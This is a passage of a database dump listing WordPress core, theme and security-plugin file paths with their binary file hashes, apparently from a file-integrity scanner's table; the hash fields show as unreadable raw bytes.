�̘9�#�L�y(��','wp-includes/images/arrow-pointer-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��b�·*L���[��','����fb�ZD1.���V��aw�4l?��p�G^�{','',0,'?'),('@��L���:���(���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��\0�6�&�	�','uj���v��d_���=\n�2fY+��V\\��','',0,'?'),('@��C��E\'�O����','wp-includes/css/dist/widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&Fy�g��<��|�','h8��y���y�3�����ҿ�\\�M9�','',0,'?'),('@��\Z!z��r���W��p','wp-content/plugins/wordfence/views/waf/option-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)\0�Q�N��#$|�','��t�Ϸ\0\re(x�T�n��_C�Q��=��K2U�C','',0,'?'),('@�XD\n�\nRN��t���','wp-admin/images/menu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�9#�d�Y`	���','�l��IE/(�p��\0�pn�T-O�z\"],=`�','',0,'?'),('@�ȯ��&O�o���','wp-content/plugins/wordfence/lib/noc1.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9e�b\0��PO�����','_�u���j������P��-KOA�ܫ�����','',0,'?'),('@�L��߯7�٭kقE','wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`3��0�h~�ݻ����h','�ZR\'��Z�w�$߃��_ɐxT�{-`��','',0,'?'),('@�;5�X��V��O�Z','wp-admin/images/mask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g~�\"��J��䩎�','��/<s�ԡ�)�\'�.�1��jkn�K9Q���','',0,'?'),('@�m����O��W','wp-admin/admin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y�X��k�*v�>','n ~m6�����롁q��2�(vUqE�','',0,'?'),('@�t�R>G�Hh��ס','wp-admin/css/revisions-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�=���a�-�II','7G�V����ԉͦE<����x�Z)��:�%','',0,'?'),('@�s�Z��^����q�v','wp-admin/images/media-button-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�WI��\\��?��','�<�:��tn�kb�wi�&��	��R����\Z','',0,'?'),('@��+�T΄\'����٤','wp-includes/ID3/module.audio.flac.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�ל�/f��T�@','�_d�s�`C�Ro\Z-��Y/�X{��Bƛ�,O�','',0,'?'),('A�lA~i^����u�Ø','wp-admin/css/customize-nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2Hr,O@��\Z.','4\'1z���3�u{�\rf�\"� ��7�\rɔ^^','',0,'?'),('AE���[�`����','wp-includes/js/thickbox/thickbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|}�\Zc�%��9j��','��b?/a#�׼�h�l��������\rk���','',0,'?'),('A+~/Ję4���$Y*��','wp-includes/block-supports/spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�wM�ӎA`ۿbkP','��4&x��R�Q��?����4~\"v,E��>N��T','',0,'?'),('A;�ت\Z���ܦ�z�','wp-includes/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�#��l�>m','��ٹmc(�l��\'�mt�ˣ�[��g��W','',0,'?'),('AK<���j���gsr�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��Kb(�\\��p�B-','�ճ* ʰ	���[q��˜P���k�','',0,'?'),('AỶ�k��{�v�r','wp-content/plugins/redirection/api/api-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q\r�$�:i��f','ϪVA��7.T��������1b\ZĽ���ޱ','',0,'?'),('Aa�@J������Ł�','wp-includes/js/tinymce/plugins/colorpicker/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' C��ȭ?d�{׭V��','���B��R�\0�!�䄚����Q�����\'5w','',0,'?'),('As�v���g�4U�','wp-includes/js/dist/nux.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i9����_!��l-R','sԟ�lL͸!�#��y,�N)h��XLq0wb�','',0,'?'),('A{&� ��V>��Νs','wp-admin/css/login-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ra#˦\n�!����[','E��9r�,hsq�a`E�-ʖ���� F;�@(g�','',0,'?'),('A����I7Y������','wp-content/plugins/redirection/locale/redirection-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�B\"m�䍢\0�^�.','1﫽H뀷�q��z�*�ޭXkz�A]�lf','',0,'?'),('A��8V,�_O�X�4���','wp-includes/rest-api/endpoints/class-wp-rest-sidebars-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>5R7��L��\\','���_���J�0D@`�G���Νx,�3\r->','',0,'?'),('A��_��z�Q�ՠ��','wp-content/plugins/wordfence/css/iptraf.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�bf.��\n�V[�xPh','J��-@ ]�-��	�cq���WQ$8�','',0,'?'),('Aػ#���\"���j�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J<1/%$�J�=Δ�','��v����p	eKK�7��9���8����������','',0,'?'),('A�\\ݛ���-��7\Z�1','wp-content/plugins/wp-cerber/assets/flags/kh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\0B/\ro��5��;�','m~�~�����B���)��~����D?��ID','',0,'?'),('A���M�pH���gH�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�.��(�K�pQ��','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('B^��t�p�k���!�','wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�*L�TG��4%P���','-������n�F�J�&T�P�o\\ϓ\\����2���','',0,'?'),('B$�[\nfIZ&��[','wp-content/plugins/wp-cerber/assets/flags/na.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� B�z�z��Q�\"�','���5�������o�]�-� �)�Qb~��\0�','',0,'?'),('BJ��O������z�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�1�MR�KE_�/','|q�UUѿÎ|z��G>*�ۜ\"���I����;�','',0,'?'),('BUj�v\\ѣ����(�','wp-content/plugins/wordfence/views/common/license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:8�����^�r','�f�B�-h������^�>A���nH0�\r&��','',0,'?'),('BU�z����&�f��','wp-content/themes/newsmagbd/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���^�!�&�͘�','cW�q-�\0���3��1�=�!��?���','',0,'?'),('Bs��塘T����L�=','wp-includes/blocks/calendar/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��iw�hw�Z�1','5v���ɭ<�%�U��B#���5z�h]� ','',0,'?'),('Bz�)���W@�r�<i\\','wp-includes/blocks/query-title/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 0o�Ԯ�<�GTw8','���ϟ?��ɐj���A�>V\r֋ou���','',0,'?'),('B��j�)��q�D�S','wp-admin/install-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�Aoq�+C2Xd��','�W>�;��%֏6s�%T���v��#o(ʓ�','',0,'?'),('B����Q���aU�%','wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȓ�Sd�9Q!\Z�p�3�','�.:�����2KS1�vG��HV','',0,'?'),('B��l���+QC�K��','wp-content/themes/newsmagbd/vendors/wp-bootstrap-navwalker/wp-bootstrap-navwalker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����|��[%|���','jJ➓��W���� D�Y�?((�(�#g�׋','',0,'?'),('Bϵ���H@x���/','wp-content/plugins/wordfence/waf/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vc+p*�\"G��?�B','�MO(��� G\rkHԽ�eq��	�Lj�F�o�O�-','',0,'?'),('B�P�X�W��6��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �QA�L���󚜆U�','���G��\n<.\ZW�r���ʪ��Ø�)','',0,'?'),('B�~���a�(�6�ώ','wp-content/themes/newsmagbd/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nU��x��%Mۂ','7VƵ@iO����U�3����>iW��Qt�','',0,'?'),('CK�J��6LAM�kV','wp-includes/blocks/post-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�P���^����v{','ɫ�ʴ��|��ns鋺�@Kg�?��]߳ysQ�','',0,'?'),('Cc�iF��h�.n7�','wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Rf�0��\nj\0i<�W��','NZ؋)_ྟ)I���F`[<�K�� �gm̳','',0,'?'),('C���I���S7�<','wp-content/plugins/wordfence/modules/login-security/views/page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ш>\\g��ǡ�$��c�','��ii��G�C����N�FL�)7%�ʙ�','',0,'?'),('C�ms\n��X�]��K�T','wp-includes/blocks/search/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �g�A��v��d�4��','�iL%},D7T\Z�S���\'����z�Xwwf�','',0,'?'),('C��/�@�l��Y��2}','wp-includes/css/dist/format-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k(O�1m<�0v��vV','���1�q�XX|ί}Cw�}�o�]5F\n�~��','',0,'?'),('C�ؚ�T�R�!vF{','wp-includes/customize/class-wp-customize-nav-menu-item-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*:Uț�J>��h�z','=��C����\0\"ȗ�gp�{��K�ϮD�\'�','',0,'?'),('C�����!y�6�㋼','wp-includes/blocks/buttons/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','əĜהT��c��˗|',')C45alJ��n)8���iK���ͿfL���','',0,'?'),('C��s\\�\n���s��\'m','wp-content/plugins/wordfence/lib/menu_tools_whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���EF?xO\0��','�wwRŎ���I�|s��o-o���8��t� ','',0,'?'),('D\'�%��S�6�>�{','wp-includes/js/dist/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3Ugl���M��u���','>���j��x3�վqoۨ�Ę#^����X�(','',0,'?'),('D	(�,|����b?�L','wp-includes/blocks/query-pagination-numbers/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��*���l�:��\\w','��w9�C�1�\'�$�IN+��3ں�$�s','',0,'?'),('Dm�\n��z�H��S���','wp-includes/images/crystal/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'^c�s���D��3T\\','g�t�( Ŏ�k`5͒��J��M5���:j�','',0,'?'),('D#q{ť���ԇb‚�','wp-includes/css/dist/customize-widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W�M���j_��M�','\':\'��z]9#\r��cC�C�_)�L�e#w4cc���','',0,'?'),('D.��:�\0��S�R8','wp-includes/ID3/module.audio-video.asf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�Oo�x�&]��\\L','͆%F	��/\r���:�����0;>�_M3��w�','',0,'?'),('D6m�e�r{pK�O�','wp-includes/locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_��	�S%��GVJ','',0,'?'),('DQ#�u��nU\\ @�<�','wp-includes/blocks/page-list/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��i�y��\rS��&g�','����`��j�]�q�\\ј��9�~t?�E���','',0,'?'),('DU}��<�޴D5�Y','wp-includes/block-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@m(��p�]P��\Z&�','�юA��b�VH�N�n��Cq`H��V�6@����','',0,'?'),('DU���uZ�F���Z','wp-content/plugins/wp-cerber/assets/flags/no.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4�	\Z���rM�','',0,'?'),('Dm��u�ϣ�!�I�5H�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pٽ��P��]G���','�|�� )��Y�M��,3���0���\Z*�9�p','',0,'?'),('Dx�ȳ)&47ܦң','wp-content/plugins/redirection/fileio/nginx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�؅�\"����>�?��}','˼��0y,s�?h{�|�hؠ\"Qv�����','',0,'?'),('D���u�\r�‹�ɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aի����� Lqw�	�','��r��_�iQ�	�a��R������+����','',0,'?'),('D����)ba�k��{��','wp-admin/includes/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�\np�Z�,���v�','k�_DRH{���\0�#�6Z�~�}����u��V�','',0,'?'),('D�C����E[=���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z#/@�(C�`Њ�X��','�/k�#�R_���ElK�ʀ`J�T�*]X��|','',0,'?'),('D�<��{��i���','wp-content/plugins/redirection/models/redirect/redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���k���bک�w','V�LI��M���r�9�.\Z�Jt��di ��`��','',0,'?'),('Dչ�����$Oa����','wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǡ�`5�����;��{�','{*F򀹗+�&,W�n\rF3�v�eaUP,�=�G�','',0,'?'),('D�E.Gྠb9k�8L=','wp-content/plugins/wp-cerber/assets/flags/hk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i.�@������C�_','�52Kx襹���*��Ȫ��b�B;b��*��\"�','',0,'?'),('D�T[�-��U���','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�q(��t��ݣ˻','at�Á}(��0�oß%�3���p�u~�ĥ','',0,'?'),('D��5\n\'�\\��~W��','wp-includes/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��k�3wh��k�͔','G�>�F|59��~�q|\n&\0��R	l�','',0,'?'),('E4��D\'BI���_#s','wp-includes/blocks/tag-cloud/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�(�9�͝e\nj͟','.RU��px�էW:����L�c��?�\"k�y��','',0,'?'),('E#���-v37�6�Ť','wp-content/plugins/wordfence/wordfence.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��XX�������`N`','��|t�r���Ԡ� \Z�;����:N���\ryP�','',0,'?'),('E4��fu\r#R:k!jgh','wp-includes/js/wp-list-revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('E5�;����tR���$L�','wp-includes/js/dist/element.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[$ң�v͓�ר��B','4��t);F�A	�s�A�#���|�����],','',0,'?'),('EJ�TW����D�)����','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f�qX�����','kO[0�Xn@�ȇr02]��-����\n,���8','',0,'?'),('Eh�������@aq��','wp-includes/session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NRM��<\\����>��','}����k+8M�U=<;��t����I*,�4#�','',0,'?'),('E�b�����O5�k#��','wp-content/plugins/redirection/locale/json/redirection-nl_NL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!8K=��伤���\Z',',/S�\"�M^�c�/2�4Gq����J���P�\r�','',0,'?'),('E��(�zRA1;eN�qD3','wp-content/plugins/wordfence/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��e��ª��\\�og','�� ��o���M�J#�A|�ߎ�(��;6R\n�','',0,'?'),('E�im�/��f\\��8+Z','wp-content/plugins/wp-cerber/assets/flags/gl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�+xO,�o*�}9','J\'�Ѫ��(�6���֌�臚#��{�dp�I�','',0,'?'),('E�}�~��M��-�]�a','wp-admin/css/widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�B�\r�+�]�}��','��+R7ġU`�D�k���ɁVB�Ҫ\r���|�','',0,'?'),('E���s=�]�����=a','wp-includes/blocks/post-template/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�ؗ�m�UK�ڵ�@K','-x/r�] Wp1�CJD�?�3�0\Z�ڕ��Q��\"E','',0,'?'),('E�$����K��cm','wp-content/plugins/wp-cerber/languages/wp-cerber.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U����:F���ӳ�','?HM�$=b��geoOyt�9�!���T��/��\r1','',0,'?'),('E�V��,�%��,SM=','wp-admin/ms-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P3�\n��7|L?MtA���','a����c�sc\Z���\"�V�L\\�њ�','',0,'?'),('E�B3A���-\r�&!�T','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�o��y�벍cK�',':P��cc�z�\"�����Q�a���QZ�d','',0,'?'),('E�Dc�9�>��	��v','wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h9�H��듦)�x��','pYq�e�\'I\n:�\0�y%G�C-|M�gf��','',0,'?'),('E�e&��0�\'�0��٣','wp-content/plugins/wp-cerber/assets/flags/ga.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`#�HG�)����4X�','�NvX���aa 	%�Q�U�SJX;M.G�j','',0,'?'),('E����`9��]','wp-content/plugins/wordfence/js/date.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j��P�ER�_�c�','��B=��0�dƩ\"B�tUc��^1�>�q&�','',0,'?'),('F�Hȝl�e��#�','wp-includes/js/tinymce/skins/wordpress/images/more-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l,��r�%�^x�%','���Y=�_�b��|ʧ&f,��<�������','',0,'?'),('Fq�����E؇��','wp-content/plugins/wp-cerber/assets/ui-stack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N3�ߪ���(Q','�\"%cb�[$2��\Z��\rN�w`� �?&�L�\\','',0,'?'),('F\r�x�w~�\rܱ��\n�','wp-includes/widgets/class-wp-widget-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&du��;�M��z�w�','L�a�qT?h$�6��=�Je��$Q��RLt','',0,'?'),('F1+\Z#�+d�{�w�{','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.D6�p�i�r`�fw�=','�2��KJ73��x�2�M2��&�+���L��L','',0,'?'),('FCW.�3���\Z��U�','wp-includes/js/jquery/ui/checkboxradio.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˂��_���>��Klk','Ě�8�\nm��r+\"�?�~iLOVR~��C','',0,'?'),('FF�v��V;v�8/�\r��','wp-includes/SimplePie/Misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��\Z��}[�X�rb^','U�l?l�N�v6�0\'�,��(N��\0�&��','',0,'?'),('FH���30m�:��s��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xR�	�Y�X���ݤ���','m���\Zc���ĭ��]���[��^�P��w','',0,'?'),('FZ��!��\"����g','wp-content/plugins/wordfence/css/activity-report-widget.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�^x;y�����c���','�ӡ��f�aM�Wv+�W�%}��`D�N��','',0,'?'),('F`M߸c�N�!����','wp-includes/blocks/image/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�BU��	i��l��0`','H�/ۤ�{�mť\0!�8�U8��9\r�Il9���p5','',0,'?'),('Fg��5�F\n�+�93','wp-content/plugins/wp-cerber/cerber-ds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CcBP�\"��~�',']����9�e0�`����T�]�Q�}`�a�','',0,'?'),('F|����w�ZQ,O��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6���?�\n�	:�›{Q%','���Z�IK/I��w¥�Ovy�E�Bi\\$G�&','',0,'?'),('F���Ժ6��ފ\0�Q','wp-content/plugins/wp-cerber/assets/flags/by.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Fƞ�01���','R8�;��k�m��l�X��V�6�V�\"��ď','',0,'?'),('F�\\�C?�Z���','wp-includes/css/customize-preview-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��މ����ګd��3','~�\'��[z�{��:����LĀN7A��	','',0,'?'),('F��Ã\\�O�fg�','wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1����v��R','N3G�\'�`��+R>�P]E�γg/�b?���UX','',0,'?'),('F�\'�B�/�4{J�{w','wp-admin/js/edit-comments.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=\n�k)Զ����W','�2~���[5��{\0���^�|��v��TO��I','',0,'?'),('F���?�C;$��H\r\r','wp-admin/css/color-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z=�����EG�> �1\Z<','t-�]Lb8�n�d�\\pm^�����i[�c�\Z��','',0,'?'),('F�V����Od%�|u�','wp-content/plugins/wordfence/images/wordfence-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('G Xe�x��w0\\�o8','wp-includes/Requests/Response/Headers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��dVND1�C����.','�?�\\v���ҧ�x�P�Ep����6��!IP','',0,'?'),('G6U�2\01R������J','wp-admin/js/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�GZ�[���c�','\'���f\\V\Z�ʟ(��Y�޾uqD�g1S e2�\r','',0,'?'),('G:Z��]Y!tI����\"','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jI78�{��r�P�','Uk�������ZM=OEw�D���w�� |I�;','',0,'?'),('Gm��:�MľV��LЉ','wp-includes/js/tinymce/utils/editable_selects.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��q2��I\'�J�9�E','�v��Gjs��f��	e�d�&�g��+���','',0,'?'),('Gq�b٫	������s�','wp-content/plugins/wp-cerber/assets/bn2ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�^ְ��sO','g���c}�;\'�B��9�ق�\Z4CW��JR�%��','',0,'?'),('Gu�������ʭ�','wp-includes/class-wp-meta-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������!<�һ-�','��R�����l��	�n���\\��h����ݢ','',0,'?'),('Gu5���aԯ��','wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}*�yY��ը�F�','1��SD��v�jk3�\0�G�<�\'|��!���','',0,'?'),('Gu�^�/1��ՁS�7','wp-includes/atomlib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2*rMb3ы�y��','��:��8��px� ��������}��)�!�','',0,'?'),('G�9q���=ʥ[3?a�','wp-admin/images/bubble_bg-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϭq�j��\n�X�<','n��%4��L���6{�/Т[�Ĭ?XW_A.r','',0,'?'),('G�7\Z��I&:�x','wp-admin/edit-form-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<x<�6�B=�L^��W ','i�2�Ւ 9�K69��֦��x��	P�U�','',0,'?'),('G�e������l|��Y','wp-content/plugins/wordfence/modules/login-security/js/admin.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��ej����\'�I�7','U�%j�Għ���|]S�Щn2��P�T�+J','',0,'?'),('G�d���IέיDj','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���f�R���emV�k','����I�C�O�Y�ʋp	�0Ox�1{t<�','',0,'?'),('HW�\njO{0,ݢ��','wp-content/plugins/redirection/locale/redirection-es_VE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=\ZC���wΫB]�2�',':��Y��,�J�Ks���_� ����f�f�S�U','',0,'?'),('H�Y�fUH�u�pd','wp-includes/Requests/Exception/HTTP/400.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���^�oA��hܦ3�\Z','�d�>����	�i�H����b$�&�n���6�p\Z','',0,'?'),('H+�E~�}�1Q���','wp-includes/js/wp-util.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�76 �7$\'�/�\nC��','G7�r<pS�C��\\����zʋ�I�G�','',0,'?'),('HA���f�,���$F-�','wp-admin/css/customize-nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��T�䐄7[�h\r�','a푥�]�y�����`�|�h���r�U���','',0,'?'),('HGh\'�x�R���~\n','wp-admin/js/customize-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� \n7MXr�xT��\n3�','�rl����b,���l�*ẜ\"[�8 /K�0:�*g�','',0,'?'),('HG��I�삞�oZN�','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('H`�\\� �r���Y�C','wp-admin/includes/class-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�ȣ�\0���O�)l+','u��S����u�����iD�p�,\\��C�M5�','',0,'?'),('H�FT��	��T-B','wp-content/themes/newsmagbd/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��N����O(s+X�','�r��A	���٣��z�� 